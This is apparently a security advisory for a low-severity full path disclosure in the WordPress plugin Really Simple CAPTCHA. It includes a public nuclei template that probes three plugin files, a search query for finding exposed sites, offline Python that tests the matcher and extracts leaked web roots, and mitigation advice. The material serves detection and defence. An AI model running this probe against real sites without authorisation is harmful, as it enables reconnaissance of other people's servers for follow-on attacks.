wp-really-simple-captcha-fpd: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure

Date: 2026-01-16 | Affected software: WordPress Plugin Really Simple CAPTCHA | PoC: public

Vulnerability description

WordPress Plugin Really Simple CAPTCHA was found to be vulnerable to Full Path Disclosure: requesting certain plugin PHP files directly makes PHP emit an error message that contains the application's full filesystem path. An unauthenticated attacker can read that path from the response, which on its own is low severity but can aid other attacks when combined with another vulnerability.

PoC code [public]

id: wp-really-simple-captcha-fpd

info:
  name: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
     WordPress Plugin Really Simple CAPTCHA was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/plugins/really-simple-captcha/
  metadata:
    max-request: 3
    verified: false
    fofa-query: body="wp-content/plugins/really-simple-captcha/"
  tags: wordpress,wp,wp-plugin,fpd,wp-really-simple-captcha

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/really-simple-captcha.php"
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/includes/filesystem.php"
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/uninstall.php"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "really-simple-captcha")'
        condition: and
# digest: 490a00463044022051deb3c4a07605564c86c1cfba242f837ede5c2b2ee116e21eed8873cde6c1e90220317540abac964c493e161b23347f25ae44deef593152e1fe5e76f8affe0469cf:922c64590222798bb761d5b6d8e72950
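The template's matcher is three DSL conditions joined with `condition: and`: an error signature (either a PHP fatal error or a "failed to open stream" warning), an HTTP status of 200 or 500, and the plugin slug somewhere in the body. The following Python is an added example, not part of the template or the plugin, that re-implements that matcher offline over constructed sample response bodies so a defender can see exactly which responses would be flagged, and then pulls the disclosed absolute path and web root out of a matching body for triage. The sample bodies, the `matches_fpd`, `disclosed_paths` and `web_root` names, and the `/var/www/html` docroot are all assumptions made for the example.

```python
import re

# Constructed sample responses (status_code, body) in the plain-text PHP error
# format (html_errors=Off). None of these were captured from a real host.
SAMPLE_RESPONSES = {
    # Direct request of a plugin file outside WordPress: WP functions undefined.
    "disclosing_fatal": (500,
        "Fatal error: Uncaught Error: Call to undefined function add_action() in "
        "/var/www/html/wp-content/plugins/really-simple-captcha/really-simple-captcha.php:42\n"
        "Stack trace:\n#0 {main}\n  thrown in "
        "/var/www/html/wp-content/plugins/really-simple-captcha/really-simple-captcha.php on line 42"),
    # A missing include reported as a warning, still leaking the docroot.
    "disclosing_warning": (200,
        "Warning: require_once(/var/www/html/wp-content/plugins/really-simple-captcha/"
        "includes/missing.php): failed to open stream: No such file or directory in "
        "/var/www/html/wp-content/plugins/really-simple-captcha/really-simple-captcha.php on line 10"),
    # Hardened deployment: guarded file exits silently, or display_errors is Off.
    "hardened": (200, ""),
    # Error page that does not mention this plugin: must not match the template.
    "unrelated_error": (500,
        "Fatal error: Uncaught Error: boom in /srv/app/index.php:3"),
}


def contains_all(body, *needles):
    """Mirror of the nuclei DSL contains_all(): every needle is a substring."""
    return all(needle in body for needle in needles)


def matches_fpd(status_code, body):
    """Evaluate the template's three matchers with condition: and."""
    error_signature = (
        contains_all(body, "Fatal error", "Uncaught Error:")
        or contains_all(body, "Warning:", "failed to open stream")
    )
    status_ok = status_code in (200, 500)
    mentions_plugin = "really-simple-captcha" in body
    return error_signature and status_ok and mentions_plugin


# Absolute *nix path ending in a .php file below wp-content/plugins.
# A hypothetical pattern for triage; extend it for Windows drive paths if needed.
PATH_RE = re.compile(r"(?:/[\w.\-]+)+/wp-content/plugins/[\w.\-/]+\.php")


def disclosed_paths(body):
    """Return the unique absolute plugin-file paths leaked in a response body."""
    return sorted({m.group(0) for m in PATH_RE.finditer(body)})


def web_root(path):
    """The document root is everything before the first /wp-content/ segment."""
    return path.split("/wp-content/", 1)[0]


def scan_samples(responses=SAMPLE_RESPONSES):
    """Run the matcher over every sample; map name -> (matched, leaked paths)."""
    results = {}
    for name, (status, body) in responses.items():
        matched = matches_fpd(status, body)
        results[name] = (matched, disclosed_paths(body) if matched else [])
    return results


if __name__ == "__main__":
    for name, (matched, paths) in scan_samples().items():
        roots = sorted({web_root(p) for p in paths})
        print(f"{name:20s} matched={matched!s:5s} web_root={roots}")
```

Two points worth keeping in mind when reading the results. First, the DSL checks are case-sensitive substring matches, so the `Warning:` literal only fires when PHP prints plain-text errors; with `html_errors=On` the word is wrapped in `<b>` tags and that branch does not match even though the path is still leaked, which is why the `Fatal error` branch carries most of the detection. Second, the "hardened" sample reflects the two standard mitigations: plugin files that begin with an `ABSPATH` guard (`if (!defined('ABSPATH')) exit;`) so direct requests return nothing, and a production `php.ini` with `display_errors = Off` and `log_errors = On` so errors go to the server log rather than the client.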
